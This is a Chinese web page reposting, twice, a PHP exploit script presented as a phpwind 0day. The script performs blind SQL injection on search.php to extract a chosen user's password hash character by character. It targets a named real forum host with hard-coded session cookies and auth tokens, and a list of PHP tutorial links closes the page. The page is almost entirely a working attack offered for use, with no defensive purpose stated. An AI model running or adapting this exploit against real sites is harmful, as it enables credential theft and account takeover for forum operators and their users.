从网上搜到的phpwind 0day的代码
作者:bea
<html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>Codz By 剑心</title><style type="text/css">body,td {font-family: "Tahoma";font-size: "12px";line-height: "150%";}.smlfo
<html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>Codz By 剑心</title><style type="text/css">body,td {font-family: "Tahoma";font-size: "12px";line-height: "150%";}.smlfont {font-family: "Tahoma";font-size: "11px";}.INPUT {FONT-SIZE: "12px";COLOR: "#000000";BACKGROUND-COLOR: "#FFFFFF";height: "18px";border: "1px solid #666666";padding-left: "2px";}.redfont {COLOR: "#A60000";}a:link,a:visited,a:active {color: "#000000";text-decoration: underline;}a:hover {color: "#465584";text-decoration: none;}.top {BACKGROUND-COLOR: "#CCCCCC"}.firstalt {BACKGROUND-COLOR: "#EFEFEF"}.secondalt {BACKGROUND-COLOR: "#F5F5F5"}</style><center>The Exploiet Of The All Phpwind Version</center><center> BY 剑心</center><br><br><br><br><br>
<?phpini_set("max_execution_time",0);error_reporting(7);
$path="/search.php";$server='bbs.ccidnet.com';$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';
$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"; $uid=2;$_GET['uid']&&$uid=$_GET['uid'];$tid=539264; $mask='没有查找匹配的内容';$count=0; //$testing=1;//$testing=$_GET['test'];if($testing) {preg_match('/X-Powered-By: php/(.+)
/ie',send(""),$php);echo$php[1];die();} //$debug=1; $temp=md5(rand(1,100)+microtime());$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";$response=send($cmd); preg_match('/FROM (.+)threads/ie',$response,$match); $pre=$match[1];if ($match[1]) echo 'Good Job!Wo Got The pre: <font color=red>'.$match[1]."</font><br>";else if (strpos($response,'value="登 录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!<br>");else {echo "Maybe It is not vul!<br>";die();} echo "Try to Get the uid=$uid 's Password:<font color=red>";$log=fopen('log.txt','a+'); for($i=0;$i<16;$i++){ $type=0;$sub=$i+9;$temp=md5(rand(1,100)+microtime());$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";$sql=urlencode($sql);$temp=md5(rand(1,100)+microtime());$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";if(!strpos(send($cmd),$mask)) { $type=0;for($m=48;$m<=57;$m++){$temp=md5(rand(1,100)+microtime());$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";$sql=urlencode($sql);$temp=md5(rand(1,100)+microtime());$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";if(!strpos(send($cmd),$mask)) { echo chr($m);fputs($log,chr($m));break;}continue;}continue;} $sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";$sql=urlencode($sql);$temp=md5(rand(1,10000)+microtime());$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";if(!strpos(send($cmd),$mask)) { $type=1;for($m=97;$m<=122;$m++){$temp=md5(rand(1,100)+microtime());$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";$sql=urlencode($sql);$temp=md5(rand(1,100)+microtime());$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";if(!strpos(send($cmd),$mask)) {echo chr($m);fputs($log,chr($m));break;}continue;}continue;} echo "error!<br>";die("Shit!May be the data you post is Not valid!Try anthor UID
"); }fclose($log);echo "<br>Done!We Post $count times!<br>"; function send($cmd){global $path,$server,$cookie,$count,$useragent,$debug; $count=$count+1;$message = "POST ".$path."? HTTP/1.1
";$message .= "Accept: */*
";$message .= "Accept-Language: zh-cn
";$message .= "Referer: http://".$server.$path."
";$message .= "Content-Type: application/x-www-form-urlencoded
";$message .= "User-Agent: ".$useragent."
";$message .= "Host: ".$server."
";$message .= "Content-length: ".strlen($cmd)."
";$message .= "Connection: Keep-Alive
";$message .= "Cookie: ".$cookie."
";$message .= "
";$message .= $cmd."
";
$fd = fsockopen( $server, 80 );fputs($fd,$message);$resp = "<pre>";while($fd&&!feof($fd)) {$resp .= fread($fd,1024);}fclose($fd);$resp .="</pre>";if($debug) {echo $cmd;echo $resp;}return $resp;}?>
有用 | 无用
<?phpini_set("max_execution_time",0);error_reporting(7);
$path="/search.php";$server='bbs.ccidnet.com';$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';
$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"; $uid=2;$_GET['uid']&&$uid=$_GET['uid'];$tid=539264; $mask='没有查找匹配的内容';$count=0; //$testing=1;//$testing=$_GET['test'];if($testing) {preg_match('/X-Powered-By: php/(.+)
/ie',send(""),$php);echo$php[1];die();} //$debug=1; $temp=md5(rand(1,100)+microtime());$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";$response=send($cmd); preg_match('/FROM (.+)threads/ie',$response,$match); $pre=$match[1];if ($match[1]) echo 'Good Job!Wo Got The pre: <font color=red>'.$match[1]."</font><br>";else if (strpos($response,'value="登 录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!<br>");else {echo "Maybe It is not vul!<br>";die();} echo "Try to Get the uid=$uid 's Password:<font color=red>";$log=fopen('log.txt','a+'); for($i=0;$i<16;$i++){ $type=0;$sub=$i+9;$temp=md5(rand(1,100)+microtime());$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";$sql=urlencode($sql);$temp=md5(rand(1,100)+microtime());$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";if(!strpos(send($cmd),$mask)) { $type=0;for($m=48;$m<=57;$m++){$temp=md5(rand(1,100)+microtime());$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";$sql=urlencode($sql);$temp=md5(rand(1,100)+microtime());$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";if(!strpos(send($cmd),$mask)) { echo chr($m);fputs($log,chr($m));break;}continue;}continue;} $sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";$sql=urlencode($sql);$temp=md5(rand(1,10000)+microtime());$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";if(!strpos(send($cmd),$mask)) { $type=1;for($m=97;$m<=122;$m++){$temp=md5(rand(1,100)+microtime());$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";$sql=urlencode($sql);$temp=md5(rand(1,100)+microtime());$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";if(!strpos(send($cmd),$mask)) {echo chr($m);fputs($log,chr($m));break;}continue;}continue;} echo "error!<br>";die("Shit!May be the data you post is Not valid!Try anthor UID
"); }fclose($log);echo "<br>Done!We Post $count times!<br>"; function send($cmd){global $path,$server,$cookie,$count,$useragent,$debug; $count=$count+1;$message = "POST ".$path."? HTTP/1.1
";$message .= "Accept: */*
";$message .= "Accept-Language: zh-cn
";$message .= "Referer: http://".$server.$path."
";$message .= "Content-Type: application/x-www-form-urlencoded
";$message .= "User-Agent: ".$useragent."
";$message .= "Host: ".$server."
";$message .= "Content-length: ".strlen($cmd)."
";$message .= "Connection: Keep-Alive
";$message .= "Cookie: ".$cookie."
";$message .= "
";$message .= $cmd."
";
$fd = fsockopen( $server, 80 );fputs($fd,$message);$resp = "<pre>";while($fd&&!feof($fd)) {$resp .= fread($fd,1024);}fclose($fd);$resp .="</pre>";if($debug) {echo $cmd;echo $resp;}return $resp;}?>
有用 | 无用
猜你喜欢
您可能感兴趣的文章:
- 《PHP边学边教》(04.编写简易的通讯录——视频教程1)
- IIS+PHP+MySQL+Zend配置 (视频教程)
- 傻瓜化配置PHP环境——Appserv
- 《PHP边学边教》(02.Apache+PHP环境配置——下篇)
- 中篇:安装及配置PHP
- Linux下PHP+MYSQL+APACHE配置过程 (摘)
- 《PHP边学边教》(02.Apache+PHP环境配置——上篇)
- [PHP] 《PHP边学边教》(01.开篇——准备工作)
- 一周学会PHP(视频)Http下载
- E路文章系统PHP
- 使用PHP数组实现无限分类,不使用数据库,不使用递归.
- Php部分常见问题总结
- global.php
- source.php查看源文件
- function.inc.php超越php
- 粗略计算在线时间,bug:ip相同
- php中处理模拟rewrite 效果
- 如何写php程序?
- IIS下配置Php+Mysql+zend的图文教程